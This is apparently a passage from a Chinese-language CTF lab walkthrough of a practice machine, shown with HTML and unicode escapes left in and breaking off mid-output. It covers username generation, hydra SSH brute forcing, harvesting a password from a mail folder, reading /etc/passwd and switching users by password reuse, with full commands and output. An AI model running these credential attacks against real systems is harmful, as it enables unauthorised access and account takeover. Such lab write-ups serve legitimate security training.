vaidez\njessica\ncarlson\nmohammed\nmansour\nxian\ntan\nannabella\ncocci\nthomas\nmitchell\npatrick\nearly\nbob\nwatson\njennifer\ncruise\njohn\ndoe\nangelina\njohnson\nkevin\nvaidez<\/code><\/pre>\n\u8fd8\u53d1\u73b0\u4e86\u4e00\u4e2a\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u5b58\u5728\u4e00\u4e2a\u767b\u5f55\u754c\u9762\u3002<\/p>\n
\u7206\u7834<\/h3>\n
\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff0c\u4f46\u662f\u672a\u679c\uff0c\u770b\u4e86\u522b\u7684\u5e08\u5085\u7684wp\uff0c\u53d1\u73b0\u662f\u4f7f\u7528\u4e86\u4e00\u4e2a\u5de5\u5177\u751f\u6210\u7528\u6237\u540d\uff0c\u989d\uff0c\u8fd9\u4e00\u70b9\u7684\u601d\u8def\u6765\u6e90\u53ef\u80fd\u662f\u56e0\u4e3a\u524d\u9762\u7684\u90a3\u4e2a\u90ae\u7bb1\u7684\u7528\u6237\u540d\u6709\u4e9b\u5947\u602a\u60f3\u5230\u7684\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ git clone https:\/\/github.com\/w0Tx\/generate-ad-username.git\nCloning into 'generate-ad-username'...\nremote: Enumerating objects: 14, done.\nremote: Counting objects: 100% (14\/14), done.\nremote: Compressing objects: 100% (14\/14), done.\nremote: Total 14 (delta 3), reused 3 (delta 0), pack-reused 0 (from 0)\nReceiving objects: 100% (14\/14), 4.44 KiB | 758.00 KiB\/s, done.\nResolving deltas: 100% (3\/3), done.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cd generate-ad-username\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ ls -la\ntotal 24\ndrwxr-xr-x 3 kali kali 4096 May 30 01:40 .\ndrwxr-xr-x 4 kali kali 4096 May 30 01:40 ..\n-rw-r--r-- 1 kali kali 1974 May 30 01:40 ADGenerator.py\ndrwxr-xr-x 8 kali kali 4096 May 30 01:40 .git\n-rw-r--r-- 1 kali kali 1030 May 30 01:40 README.md\n-rw-r--r-- 1 kali kali 75 May 30 01:40 test.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ cat README.md \n# Why ?\n\nThis script has been made for quick creation of usernames to use against AD when you only have the names and surnames for OSCP, Labs... \n\nIt's not perfect, feel free to modify it.\n\nNaming convention can be found there : [https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/index.html#recon-active-directory-no-credssessions](https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/index.html#recon-active-directory-no-credssessions)\n\n```\nNameSurname\nName.Surname\nNamSur (3letters of each)\nNam.Sur\nNSurname\nN.Surname\nSurnameName\nSurname.Name\nSurnameN\nSurname.N\n```\n\n# How ?\n\nInput names should be seperated by ','.\n\n```\ntest,test2\ntest3,test4\n```\n\nThen : `python3 ADGenerator.py names.txt`\n\nExample of output : \n\n```\nmetodijelizabeta\nmetodij-elizabeta\nmetodij.elizabeta\nmeteli\nmet-eli\nmet.eli\nmelizabeta\nm-elizabeta\nm.elizabeta\nelizabetametodij\nelizabeta-metodij\nelizabeta.metodij\nelimet\neli-met\neli.met\nemetodij\ne-metodij\ne.metodij\nelizabetam\nelizabeta-m\nelizabeta.m\n```\n<\/code><\/pre>\n\u8fd9\u6837\u7684\u8bdd\uff0c\u5c31\u8981\u7528\u56de\u6700\u539f\u59cb\u7684\u90a3\u4e2auser\u4e86\uff1a<\/p>\n
Jessica Carlson\nMohammed Mansour\nXian Tan\nAnnabella Cocci\nThomas Mitchell\nPatrick Early\nBob Watson\nJennifer Cruise\nJohn Doe\nAngelina Johnson\nKevin Vaidez<\/code><\/pre>\n\u518d\u4fee\u6539\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ cat new_user | tr ' ' ',' > user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ cat user \nJessica,Carlson\nMohammed,Mansour\nXian,Tan\nAnnabella,Cocci\nThomas,Mitchell\nPatrick,Early\nBob,Watson\nJennifer,Cruise\nJohn,Doe\nAngelina,Johnson\nKevin,Vaidez<\/code><\/pre>\n\u7136\u540e\u5c31\u53ef\u4ee5\u4f7f\u7528\u811a\u672c\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ python3 ADGenerator.py user > ..\/user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ cat ..\/user | head -n 10\njessicacarlson\njessica-carlson\njessica.carlson\njescar\njes-car\njes.car\njcarlson\nj-carlson\nj.carlson\ncarlsonjessica<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\u5373\u53ef\uff0c\u9700\u8981\u6ce8\u610f\u5230\u4e3b\u673a\u4e0a\u5b58\u572822<\/code>\u548c22222<\/code>\u4e24\u4e2assh<\/code>\u7aef\u53e3\uff0c\u9700\u8981\u8fdb\u884c\u7504\u522b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ssh valdezk@$IP -p 22222\nThe authenticity of host '[10.0.2.22]:22222 ([10.0.2.22]:22222)' can't be established.\nED25519 key fingerprint is SHA256:Y+iV2eHvzSBp6ZbF+2VqTJdZ5+XyH5tVaxNCzS7tp3I.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? \nHost key verification failed.<\/code><\/pre>\n\u53d1\u73b0\u516c\u94a5\u4e0d\u5339\u914d\uff0c\u4e34\u65f6\u7981\u7528\u4e3b\u673a\u5bc6\u94a5\u9a8c\u8bc1\uff08\u4ec5\u9650\u5185\u7f51\u6d4b\u8bd5\uff09<\/strong><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ssh -o StrictHostKeyChecking=no hgbe@10.0.2.22 \nWarning: Permanently added '10.0.2.22' (ED25519) to the list of known hosts.\nhgbe@10.0.2.22's password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ssh -o StrictHostKeyChecking=no hgbe@10.0.2.22 -p 22222\n @@@ \n @@@@@@@@@ @@@@@@ \n @@@@@@@@@@@@@@ (@@ \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557 \n @@@@@@@@@@@@@ @@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@@@ @@@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@ @@ \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \n @@@@@@@@@@ @@@ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \n @@@@@@@ @@@ \n @@@@@@@ \n\n _______________________________________________________________________________________________________\n | _WARNING: This system is restricted to authorized users!___________________________________________ |\n | | | |\n | | IT IS AN OFFENSE TO CONTINUE WITHOUT PROPER AUTHORIZATION. | |\n | | | |\n | | This system is restricted to authorized users. | | \n | | Individuals who attempt unauthorized access will be prosecuted. | | \n | | If you're unauthorized, terminate access now! | | \n | | | |\n | | | |\n | |___________________________________________________________________________________________________| |\n |_______________________________________________________________________________________________________|\nhgbe@10.0.2.22's password: <\/code><\/pre>\n\u5f88\u660e\u663e\uff0c\u4f18\u5148\u5c1d\u8bd5\u4e0b\u9762\u7684\uff0c\u5c1d\u8bd5\u7206\u7834\uff0c\u7531\u4e8e\u770b\u4e86\u5e08\u5085\u4eec\u7684\u7ed3\u679c\u6211\u8fd9\u91cc\u5c31\u76f4\u63a5\u505a\u505a\u6837\u5b50\u4e86\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ hydra -L user -P pass ssh:\/\/$IP -f -s 22222 -V \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-05-30 02:29:21\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 20 login tries (l:2\/p:10), ~2 tries per task\n[DATA] attacking ssh:\/\/10.0.2.22:22222\/\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Xxxxxxxxx001" - 1 of 20 [child 0] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Password123!" - 2 of 20 [child 1] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Greatplace2work!" - 3 of 20 [child 2] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Diciembre@2017" - 4 of 20 [child 3] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Hairdresser1!" - 5 of 20 [child 4] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "1qa2ws3ed4rf" - 6 of 20 [child 5] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "XXXX12345678" - 7 of 20 [child 6] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Hairdresser1" - 8 of 20 [child 7] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Xxxxxxxxx002" - 9 of 20 [child 8] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Xxxxxxxxxx01" - 10 of 20 [child 9] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Xxxxxxxxx001" - 11 of 20 [child 10] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Password123!" - 12 of 20 [child 11] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Greatplace2work!" - 13 of 20 [child 12] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Diciembre@2017" - 14 of 20 [child 13] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Hairdresser1!" - 15 of 20 [child 14] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "1qa2ws3ed4rf" - 16 of 20 [child 15] (0\/0)\n[22222][ssh] host: 10.0.2.22 login: valdezk password: Greatplace2work!\n[STATUS] attack finished for 10.0.2.22 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-05-30 02:29:23<\/code><\/pre>\n\u5f97\u5230\u4e00\u4e32\u65b0\u7684\u51ed\u8bc1\uff1a<\/p>\n
valdezk:Greatplace2work!<\/code><\/pre>\n\u767b\u5f55\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ssh -o StrictHostKeyChecking=no valdezk@10.0.2.22 -p 22222\n @@@ \n @@@@@@@@@ @@@@@@ \n @@@@@@@@@@@@@@ (@@ \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557 \n @@@@@@@@@@@@@ @@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@@@ @@@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@ @@ \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \n @@@@@@@@@@ @@@ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \n @@@@@@@ @@@ \n @@@@@@@ \n\n _______________________________________________________________________________________________________\n | _WARNING: This system is restricted to authorized users!___________________________________________ |\n | | | |\n | | IT IS AN OFFENSE TO CONTINUE WITHOUT PROPER AUTHORIZATION. | |\n | | | |\n | | This system is restricted to authorized users. | | \n | | Individuals who attempt unauthorized access will be prosecuted. | | \n | | If you're unauthorized, terminate access now! | | \n | | | |\n | | | |\n | |___________________________________________________________________________________________________| |\n |_______________________________________________________________________________________________________|\nvaldezk@10.0.2.22's password: \nWelcome to Ubuntu 22.04.3 LTS (GNU\/Linux 5.15.0-79-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\n * Management: https:\/\/landscape.canonical.com\n * Support: https:\/\/ubuntu.com\/advantage\n\n System information as of Fri May 30 06:36:11 AM UTC 2025\n\n System load: 0.169921875 Processes: 245\n Usage of \/: 29.4% of 47.93GB Users logged in: 0\n Memory usage: 64% IPv4 address for enp0s3: 10.0.2.22\n Swap usage: 1%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nExpanded Security Maintenance for Applications is not enabled.\n\n10 updates can be applied immediately.\nTo see these additional updates run: apt list --upgradable\n\nEnable ESM Apps to receive additional future security updates.\nSee https:\/\/ubuntu.com\/esm or run: sudo pro status\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nNew release '24.04.2 LTS' available.\nRun 'do-release-upgrade' to upgrade to it.\n\nvaldezk@codeshield:~$ whoami;id;pwd\nvaldezk\nuid=1007(valdezk) gid=1007(valdezk) groups=1007(valdezk)\n\/home\/valdezk\nvaldezk@codeshield:~$ ls -la\ntotal 172\ndrwxr-x--- 18 valdezk valdezk 4096 Aug 29 2023 .\ndrwxr-xr-x 14 root root 4096 Aug 26 2023 ..\n-rw-rw-r-- 1 valdezk valdezk 0 Aug 28 2023 .bash_history\n-rw-r--r-- 1 valdezk valdezk 220 Aug 26 2023 .bash_logout\n-rw-r--r-- 1 valdezk valdezk 3771 Aug 26 2023 .bashrc\ndrwx------ 12 valdezk valdezk 4096 May 30 06:29 .cache\ndrwx------ 11 valdezk valdezk 4096 Aug 28 2023 .config\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Desktop\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Documents\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Downloads\ndrwx------ 3 valdezk valdezk 4096 Aug 28 2023 .local\ndrwx------ 3 valdezk valdezk 4096 Aug 28 2023 .mozilla\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Music\ndrwxrwxrwt 2 valdezk valdezk 4096 Aug 29 2023 .pcsc10\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Pictures\n-rw-r--r-- 1 valdezk valdezk 807 Aug 26 2023 .profile\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Public\ndrwx------ 3 valdezk valdezk 4096 Aug 28 2023 snap\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Templates\ndrwxrwxr-t 2 valdezk valdezk 4096 Aug 29 2023 thinclient_drives\ndrwx------ 6 valdezk valdezk 4096 Aug 28 2023 .thunderbird\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-clipboard-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-clipboard-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-clipboard-tty4-control.pid\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-draganddrop-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-draganddrop-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-draganddrop-tty4-control.pid\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-hostversion-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-hostversion-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-hostversion-tty4-control.pid\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-seamless-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-seamless-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-seamless-tty4-control.pid\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-vmsvga-session-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-vmsvga-session-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-vmsvga-session-tty4-control.pid\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Videos\n-rw------- 1 valdezk valdezk 56 Aug 29 2023 .Xauthority\n-rw-r--r-- 1 valdezk valdezk 18728 Aug 29 2023 .xorgxrdp.10.log\n-rw------- 1 valdezk valdezk 3985 Aug 29 2023 .xsession-errors<\/code><\/pre>\n\u53ef\u4ee5\uff01<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u627e\u4e00\u4e0b\u5bc6\u7801\uff1a<\/p>\n
valdezk@codeshield:~$ grep -Pnir pass<\/code><\/pre>\n\u7136\u540e\u627e\u5230\u4e86\u4e00\u4e2a\uff1a<\/p>\n
.thunderbird\/fx2h7mhy.default-release\/ImapMail\/mail.codeshield.hmv\/INBOX:Password: D@taWh1sperer!<\/code><\/pre>\n\u7206\u7834\u65b0\u7528\u6237<\/h3>\n
\u7136\u540e\u627e\u4e00\u4e0b\u6709\u6ca1\u6709\u7c7b\u4f3c\u7684\u7528\u6237\u540d\uff1a<\/p>\n
valdezk@codeshield:~$ cut -d: -f1 \/etc\/passwd\nroot\ndaemon\nbin\nsys\nsync\ngames\nman\nlp\nmail\nnews\nuucp\nproxy\nwww-data\nbackup\nlist\nirc\ngnats\nnobody\n_apt\nsystemd-network\nsystemd-resolve\nmessagebus\nsystemd-timesync\npollinate\nsshd\nsyslog\nuuidd\ntcpdump\ntss\nlandscape\nfwupd-refresh\nusbmux\nearlyp\nlxd\nrtkit\ndnsmasq\nkernoops\nsystemd-oom\nwhoopsie\navahi-autoipd\nnm-openvpn\navahi\ncups-pk-helper\nsssd\nspeech-dispatcher\nsaned\ncolord\ngeoclue\npulse\ngnome-initial-setup\nhplip\ngdm\nvboxadd\nftp\ncowrie\nmysql\npostfix\ndovecot\ndovenull\nclamav\namavis\ndebian-spamd\nvmail\nmlmmj\niredadmin\niredapd\nnetdata\npostgres\nmitchellt\nvaldezk\ncarlsonj\nmansourm\ntanx\ncoccia\nxrdp<\/code><\/pre>\n\u548c\u4e4b\u524d\u7684\u7528\u6237\u540d\u5bf9\u6bd4\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ grep -F -f user1 user2 \nearlyp\nmitchellt\ncarlsonj\nmansourm\ntanx\ncoccia<\/code><\/pre>\n\u5b58\u5728\u51e0\u4e2a\u7528\u6237\u540d\u76f8\u540c\uff0c\u7528\u8fd9\u91cc\u7684\u7528\u6237\u540d\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ hydra -L user3 -p D@taWh1sperer! ssh:\/\/$IP:22222 -f\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-05-30 02:51:39\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6\/p:1), ~1 try per task\n[DATA] attacking ssh:\/\/10.0.2.22:22222\/\n[22222][ssh] host: 10.0.2.22 login: mitchellt password: D@taWh1sperer!\n[STATUS] attack finished for 10.0.2.22 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-05-30 02:51:40<\/code><\/pre>\n\u5f97\u5230\u65b0\u7528\u6237\uff0c\u76f4\u63a5\u5207\u6362\uff1a<\/p>\n
valdezk@codeshield:~$ su mitchellt\nPassword: \nmitchellt@codeshield:\/home\/valdezk$ cd ~\nmitchellt@codeshield:~$ ls -la\ntotal 112\ndrwxr-x--- 17 mitchellt mitchellt 4096 Aug 30 2023 .\ndrwxr-xr-x 14 root root 4096 Aug 26 2023 ..\n-rw------- 1 mitchellt mitchellt 209 Aug 30 2023 .bash_history\n-rw-r--r-- 1 mitchellt mitchellt 220 Aug 26 2023 .bash_logout\n-rw-r--r-- 1 mitchellt mitchellt 3771 Aug 26 2023 .bashrc\ndrwx------ 11 mitchellt mitchellt 4096 May 30 06:51 .cache\ndrwx------ 12 mitchellt mitchellt 4096 Aug 29 2023 .config\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Desktop\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Documents\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Downloads\n-rw------- 1 mitchellt mitchellt 20 Aug 29 2023 .lesshst\ndrwx------ 3 mitchellt mitchellt 4096 Aug 28 2023 .local\ndrwxrwxr-x 6 mitchellt mitchellt 4096 Aug 30 2023 mining\ndrwx------ 3 mitchellt mitchellt 4096 Aug 28 2023 .mozilla\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Music\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Pictures\n-rw-r--r-- 1 mitchellt mitchellt 807 Aug 26 2023 .profile\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Public\ndrwx------ 3 mitchellt mitchellt 4096 Aug 29 2023 snap\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Templates\ndrwx------ 6 mitchellt mitchellt 4096 Aug 28 2023 .thunderbird\n-rwxrwx--- 1 mitchellt mitchellt 2401 Aug 28 2023 user.txt\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-clipboard-tty2-control.pid\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-draganddrop-tty2-control.pid\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-hostversion-tty2-control.pid\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-seamless-tty2-control.pid\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-vmsvga-session-tty2-control.pid\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Videos\nmitchellt@codeshield:~$ cat user.txt \n @@@ \n @@@@@@@@@ @@@@@@ \n @@@@@@@@@@@@@@ (@@ \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 